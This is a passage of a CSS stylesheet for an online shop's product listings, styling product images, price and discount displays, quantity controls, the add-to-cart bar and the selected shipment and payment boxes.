}
.category-view .row .spacer .spacer-img,
.browse-view .row .spacer .spacer-img,
.latest-view .row .spacer .spacer-img,
.recent-view .row .spacer .spacer-img,
.featured-view .row .spacer .spacer-img,
.topten-view .row .spacer .spacer-img {
  overflow: hidden;
  text-align: center;
  width: 100%;
  margin: 0;
  padding: 0;
}
.category-view .row .spacer .spacer-img img,
.browse-view .row .spacer .spacer-img img,
.latest-view .row .spacer .spacer-img img,
.recent-view .row .spacer .spacer-img img,
.featured-view .row .spacer .spacer-img img,
.topten-view .row .spacer .spacer-img img {
  -webkit-transform: scale(1);
  transform: scale(1);
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
  display: inline-table;
  float: left;
}
.category-view .row .spacer .spacer-img img.browseProductImage,
.browse-view .row .spacer .spacer-img img.browseProductImage,
.latest-view .row .spacer .spacer-img img.browseProductImage,
.recent-view .row .spacer .spacer-img img.browseProductImage,
.featured-view .row .spacer .spacer-img img.browseProductImage,
.topten-view .row .spacer .spacer-img img.browseProductImage {
  width: 100%;
  max-height: 100%;
}
.category-view .row .spacer .spacer-img span.overlay,
.browse-view .row .spacer .spacer-img span.overlay,
.latest-view .row .spacer .spacer-img span.overlay,
.recent-view .row .spacer .spacer-img span.overlay,
.featured-view .row .spacer .spacer-img span.overlay,
.topten-view .row .spacer .spacer-img span.overlay {
  width: 100.1%;
  height: auto;
  bottom: 0;
  left: 0;
  right: 0;
  padding: 20px 20px 19px;
  background-color: rgba(255,255,255,0.5);
  text-align: center;
  display: table;
  position: absolute;
  box-shadow: inset 0 -40px 40px rgba(255,255,255,0.9);
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.category-view .row .spacer .spacer-img span.overlay >h3,
.browse-view .row .spacer .spacer-img span.overlay >h3,
.latest-view .row .spacer .spacer-img span.overlay >h3,
.recent-view .row .spacer .spacer-img span.overlay >h3,
.featured-view .row .spacer .spacer-img span.overlay >h3,
.topten-view .row .spacer .spacer-img span.overlay >h3 {
  color: #555;
  line-height: 1.2;
  padding: 0;
  margin: 0 auto;
  font-size: 140%;
}
.category-view .row .spacer .spacer-img:hover span.overlay,
.browse-view .row .spacer .spacer-img:hover span.overlay,
.latest-view .row .spacer .spacer-img:hover span.overlay,
.recent-view .row .spacer .spacer-img:hover span.overlay,
.featured-view .row .spacer .spacer-img:hover span.overlay,
.topten-view .row .spacer .spacer-img:hover span.overlay {
  padding: 7% 20px;
  background-color: rgba(255,255,255,0.7);
  box-shadow: inset 0 -50px 50px rgba(255,255,255,0.9), 0 -1px 3px rgba(0,0,0,0.07);
}
.category-view .row .spacer .spacer-img:hover span.overlay >h3,
.browse-view .row .spacer .spacer-img:hover span.overlay >h3,
.latest-view .row .spacer .spacer-img:hover span.overlay >h3,
.recent-view .row .spacer .spacer-img:hover span.overlay >h3,
.featured-view .row .spacer .spacer-img:hover span.overlay >h3,
.topten-view .row .spacer .spacer-img:hover span.overlay >h3 {
  color: #222;
}
.category-view .row .spacer .spacer-inner,
.browse-view .row .spacer .spacer-inner,
.latest-view .row .spacer .spacer-inner,
.recent-view .row .spacer .spacer-inner,
.featured-view .row .spacer .spacer-inner,
.topten-view .row .spacer .spacer-inner {
  text-align: center;
  padding: 25px 20px;
}
.category-view .row .spacer .spacer-inner h2,
.browse-view .row .spacer .spacer-inner h2,
.latest-view .row .spacer .spacer-inner h2,
.recent-view .row .spacer .spacer-inner h2,
.featured-view .row .spacer .spacer-inner h2,
.topten-view .row .spacer .spacer-inner h2 {
  margin: 5px auto;
  font-size: 170%;
  line-height: 1.5;
  display: block;
  width: 100%;
}
.category-view .row .spacer .spacer-inner h2 a,
.browse-view .row .spacer .spacer-inner h2 a,
.latest-view .row .spacer .spacer-inner h2 a,
.recent-view .row .spacer .spacer-inner h2 a,
.featured-view .row .spacer .spacer-inner h2 a,
.topten-view .row .spacer .spacer-inner h2 a {
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.category-view .row .spacer .spacer-inner .product_s_desc,
.browse-view .row .spacer .spacer-inner .product_s_desc,
.latest-view .row .spacer .spacer-inner .product_s_desc,
.recent-view .row .spacer .spacer-inner .product_s_desc,
.featured-view .row .spacer .spacer-inner .product_s_desc,
.topten-view .row .spacer .spacer-inner .product_s_desc {
  margin: 0 auto;
}
.category-view .row .spacer .spacer-inner .product_s_desc hr,
.browse-view .row .spacer .spacer-inner .product_s_desc hr,
.latest-view .row .spacer .spacer-inner .product_s_desc hr,
.recent-view .row .spacer .spacer-inner .product_s_desc hr,
.featured-view .row .spacer .spacer-inner .product_s_desc hr,
.topten-view .row .spacer .spacer-inner .product_s_desc hr {
  margin: 20px auto;
  width: 100%;
  clear: both;
}
.category-view .row .spacer .spacer-inner .product-price,
.browse-view .row .spacer .spacer-inner .product-price,
.latest-view .row .spacer .spacer-inner .product-price,
.recent-view .row .spacer .spacer-inner .product-price,
.featured-view .row .spacer .spacer-inner .product-price,
.topten-view .row .spacer .spacer-inner .product-price {
  margin: 10px auto 0;
  padding: 0;
  text-align: center;
  display: block;
  height: auto;
  width: 100%;
  clear: both;
}
.category-view .row .spacer .spacer-inner .product-price .percent-off,
.browse-view .row .spacer .spacer-inner .product-price .percent-off,
.latest-view .row .spacer .spacer-inner .product-price .percent-off,
.recent-view .row .spacer .spacer-inner .product-price .percent-off,
.featured-view .row .spacer .spacer-inner .product-price .percent-off,
.topten-view .row .spacer .spacer-inner .product-price .percent-off {
  background: rgba(241,72,51,0.67);
  padding: 6px 8px;
  position: absolute;
  border-radius: 3px 3px 0 3px;
  top: 15px;
  right: -10px;
  color: #fff;
  font-size: 14px;
  font-weight: 600;
  text-transform: uppercase;
  box-shadow: 0 2px 0 rgba(0,0,0,0.1);
  text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
}
.category-view .row .spacer .spacer-inner .product-price .percent-off:after,
.browse-view .row .spacer .spacer-inner .product-price .percent-off:after,
.latest-view .row .spacer .spacer-inner .product-price .percent-off:after,
.recent-view .row .spacer .spacer-inner .product-price .percent-off:after,
.featured-view .row .spacer .spacer-inner .product-price .percent-off:after,
.topten-view .row .spacer .spacer-inner .product-price .percent-off:after {
  content: "";
  position: absolute;
  width: 5px;
  height: 5px;
  margin-top: 23px;
  right: 0;
  border-top: 3px solid rgba(241,72,51,0.57);
  border-bottom: 3px solid transparent;
  border-left: 5px solid rgba(241,72,51,0.57);
  border-right: 5px solid transparent;
}
.category-view .row .spacer .spacer-inner .product-price .percent-off > span,
.browse-view .row .spacer .spacer-inner .product-price .percent-off > span,
.latest-view .row .spacer .spacer-inner .product-price .percent-off > span,
.recent-view .row .spacer .spacer-inner .product-price .percent-off > span,
.featured-view .row .spacer .spacer-inner .product-price .percent-off > span,
.topten-view .row .spacer .spacer-inner .product-price .percent-off > span {
  margin-left: 5px;
}
.category-view .row .spacer .spacer-inner .product-price >div,
.browse-view .row .spacer .spacer-inner .product-price >div,
.latest-view .row .spacer .spacer-inner .product-price >div,
.recent-view .row .spacer .spacer-inner .product-price >div,
.featured-view .row .spacer .spacer-inner .product-price >div,
.topten-view .row .spacer .spacer-inner .product-price >div {
  font-size: 13px;
}
.category-view .row .spacer .spacer-inner .product-price >div >span + span,
.browse-view .row .spacer .spacer-inner .product-price >div >span + span,
.latest-view .row .spacer .spacer-inner .product-price >div >span + span,
.recent-view .row .spacer .spacer-inner .product-price >div >span + span,
.featured-view .row .spacer .spacer-inner .product-price >div >span + span,
.topten-view .row .spacer .spacer-inner .product-price >div >span + span {
  font-size: 15px;
}
.category-view .row .spacer .spacer-inner .product-price *,
.category-view .row .spacer .spacer-inner .product-price .vm-price-desc,
.browse-view .row .spacer .spacer-inner .product-price *,
.browse-view .row .spacer .spacer-inner .product-price .vm-price-desc,
.latest-view .row .spacer .spacer-inner .product-price *,
.latest-view .row .spacer .spacer-inner .product-price .vm-price-desc,
.recent-view .row .spacer .spacer-inner .product-price *,
.recent-view .row .spacer .spacer-inner .product-price .vm-price-desc,
.featured-view .row .spacer .spacer-inner .product-price *,
.featured-view .row .spacer .spacer-inner .product-price .vm-price-desc,
.topten-view .row .spacer .spacer-inner .product-price *,
.topten-view .row .spacer .spacer-inner .product-price .vm-price-desc {
  line-height: 1.3;
}
.category-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice,
.browse-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice,
.latest-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice,
.recent-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice,
.featured-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice,
.topten-view .row .spacer .spacer-inner .PricebasePrice > span.PricebasePrice {
  font-size: 17px;
}
.category-view .row .spacer .spacer-inner .price-without-discount,
.browse-view .row .spacer .spacer-inner .price-without-discount,
.latest-view .row .spacer .spacer-inner .price-without-discount,
.recent-view .row .spacer .spacer-inner .price-without-discount,
.featured-view .row .spacer .spacer-inner .price-without-discount,
.topten-view .row .spacer .spacer-inner .price-without-discount {
  margin-bottom: 8px;
}
.category-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice,
.browse-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice,
.latest-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice,
.recent-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice,
.featured-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice,
.topten-view .row .spacer .spacer-inner .price-without-discount .PricebasePrice > span.PricebasePrice {
  text-decoration: line-through;
  color: #f14833;
}
.category-view .row .spacer .spacer-inner .PricediscountAmount,
.browse-view .row .spacer .spacer-inner .PricediscountAmount,
.latest-view .row .spacer .spacer-inner .PricediscountAmount,
.recent-view .row .spacer .spacer-inner .PricediscountAmount,
.featured-view .row .spacer .spacer-inner .PricediscountAmount,
.topten-view .row .spacer .spacer-inner .PricediscountAmount {
  margin-top: 8px;
}
.category-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount,
.browse-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount,
.latest-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount,
.recent-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount,
.featured-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount,
.topten-view .row .spacer .spacer-inner .PricediscountAmount > span.PricediscountAmount {
  color: #f14833;
}
.category-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.category-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPrice .vm-price-desc,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .vm-price-desc {
  font-size: 130%;
}
.category-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.category-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.category-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.category-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.browse-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.latest-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.recent-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.featured-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPrice,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPrice .PricesalesPriceTt,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPrice,
.topten-view .row .spacer .spacer-inner .product-price .PricesalesPriceTt .PricesalesPriceTt {
  font-size: 25px;
}
.category-view .row .spacer .addtocart-bar,
.browse-view .row .spacer .addtocart-bar,
.latest-view .row .spacer .addtocart-bar,
.recent-view .row .spacer .addtocart-bar,
.featured-view .row .spacer .addtocart-bar,
.topten-view .row .spacer .addtocart-bar {
  padding: 0;
  margin: 25px auto 0;
  width: 100%;
  display: block;
}
.category-view .row .spacer .addtocart-bar .cd-customization,
.browse-view .row .spacer .addtocart-bar .cd-customization,
.latest-view .row .spacer .addtocart-bar .cd-customization,
.recent-view .row .spacer .addtocart-bar .cd-customization,
.featured-view .row .spacer .addtocart-bar .cd-customization,
.topten-view .row .spacer .addtocart-bar .cd-customization {
  width: 66%;
  width: calc(61%);
  float: left;
}
.category-view .row .spacer .addtocart-bar .cd-customization button,
.browse-view .row .spacer .addtocart-bar .cd-customization button,
.latest-view .row .spacer .addtocart-bar .cd-customization button,
.recent-view .row .spacer .addtocart-bar .cd-customization button,
.featured-view .row .spacer .addtocart-bar .cd-customization button,
.topten-view .row .spacer .addtocart-bar .cd-customization button {
  width: 100%;
}
.category-view .row .spacer .addtocart-bar .calculate,
.browse-view .row .spacer .addtocart-bar .calculate,
.latest-view .row .spacer .addtocart-bar .calculate,
.recent-view .row .spacer .addtocart-bar .calculate,
.featured-view .row .spacer .addtocart-bar .calculate,
.topten-view .row .spacer .addtocart-bar .calculate {
  width: 29%;
  display: inline-table;
  float: left;
  margin: 4px 10px 0 0;
}
.category-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
.browse-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
.latest-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
.recent-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
.featured-view .row .spacer .addtocart-bar .calculate >label.quantity_box,
.topten-view .row .spacer .addtocart-bar .calculate >label.quantity_box {
  display: none;
  text-indent: -9999em;
}
.category-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
.browse-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
.latest-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
.recent-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
.featured-view .row .spacer .addtocart-bar .calculate span.quantity-box input,
.topten-view .row .spacer .addtocart-bar .calculate span.quantity-box input {
  padding: 0;
  border-radius: 3px;
  border: 0;
  box-shadow: none;
  background: rgba(0,0,0,0.05);
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls {
  background-image: none;
  margin: 0;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  width: 20px;
  height: 16px;
  display: block;
  position: absolute;
  z-index: 2;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus {
  margin: -16px 0 0 0;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fa {
  color: #999;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .fas,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-plus:hover + .far {
  color: #999;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus {
  margin: 0;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fa {
  color: #999;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .fas,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls input.quantity-minus:hover + .far {
  color: #999;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .far,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .far,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .far,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .far,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .far,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .far {
  position: absolute;
  z-index: 1;
  font-size: 9px;
  line-height: 12px;
  color: #bbb;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-up,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-up,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-up {
  margin: -13px 0 0 -3px;
}
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.category-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.browse-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.latest-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.recent-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.featured-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fa.fa-chevron-down,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .fas.fa-chevron-down,
.topten-view .row .spacer .addtocart-bar .calculate .quantity-controls .far.fa-chevron-down {
  margin: 0 0 0 -3px;
}
.category-view .row .spacer:hover img,
.browse-view .row .spacer:hover img,
.latest-view .row .spacer:hover img,
.recent-view .row .spacer:hover img,
.featured-view .row .spacer:hover img,
.topten-view .row .spacer:hover img {
  transform: scale(1.1);
}
.category-view .row .ratingbox,
.browse-view .row .ratingbox,
.latest-view .row .ratingbox,
.recent-view .row .ratingbox,
.featured-view .row .ratingbox,
.topten-view .row .ratingbox {
  background-size: 13px;
  max-width: 65px !important;
}
.category-view .row .vm-details-button,
.browse-view .row .vm-details-button,
.latest-view .row .vm-details-button,
.recent-view .row .vm-details-button,
.featured-view .row .vm-details-button,
.topten-view .row .vm-details-button {
  display: none;
}
.category-view .horizontal-separator,
.browse-view .horizontal-separator,
.latest-view .horizontal-separator,
.recent-view .horizontal-separator,
.featured-view .horizontal-separator,
.topten-view .horizontal-separator {
  height: auto;
  background: none;
  margin: 20px 0;
}
.vm-order-done {
  text-align: center;
  margin: 0 auto;
}
.sectiontableentry1 td h4 {
  font-size: 145%;
  margin: 10px auto 25px;
}
.sectiontableentry1 td .selected_shipment,
.sectiontableentry1 td .selected_payment {
  position: relative;
  background: rgba(0,0,0,0.03) url('data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI1IiBoZWlnaHQ9IjUiPg0KPHJlY3Qgd2lkdGg9IjUiIGhlaWdodD0iNSIgZmlsbD0ibm9uZSI+PC9yZWN0Pg0KPHBhdGggZD0iTTAgNUw1IDBaTTYgNEw0IDZaTS0xIDFMMSAtMVoiIHN0cm9rZT0iI2ZmZiIgc3Ryb2tlLXdpZHRoPSIxIj48L3BhdGg+DQo8L3N2Zz4=') center center repeat;
  padding: 20px 5px;
  display: block;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  border: 1px solid rgba(126,126,126,0.1);
  border-radius: 4px;
}
.sectiontableentry1 td .selected_shipment i.pe-7s-check,
.sectiontableentry1 td .selected_payment i.pe-7s-check {
  color: #f6887b;
  font-size: 32px;
  line-height: 1;
  vertical-align: middle;
  position: absolute;
  right: 8px;
  top: -14px;
}
.sectiontableentry1 td .selected_shipment .vmCartShipmentLogo,
.sectiontableentry1 td .selected_shipment .vmCartPaymentLogo,
.sectiontableentry1 td .selected_payment .vmCartShipmentLogo,
.sectiontableentry1 td .selected_payment .vmCartPaymentLogo {
  float: left;
  margin: 0 12px;
}
.sectiontableentry1 td .selected_shipment .vmCartShipmentLogo >img,
.sectiontableentry1 td .selected_shipment .vmCartPaymentLogo >img,
.sectiontableentry1 td .selected_payment .vmCartShipmentLogo >img,
.sectiontableentry1 td .selected_payment .vmCartPaymentLogo >img {
  max-width: 150px;
  max-height: 70px;
  margin: 0 auto;
}
.sectiontableentry1 td .selected_shipment span,
.sectiontableentry1 td .selected_payment span {
  font-size: 100%;
  line-height: 20px;
}
.sectiontableentry1 td .selected_shipment span.vmshipment_name,
.sectiontableentry1 td .selected_payment span.vmshipment_name {
  font-size: 100%;
  text-align: left;
  margin: 0;
}
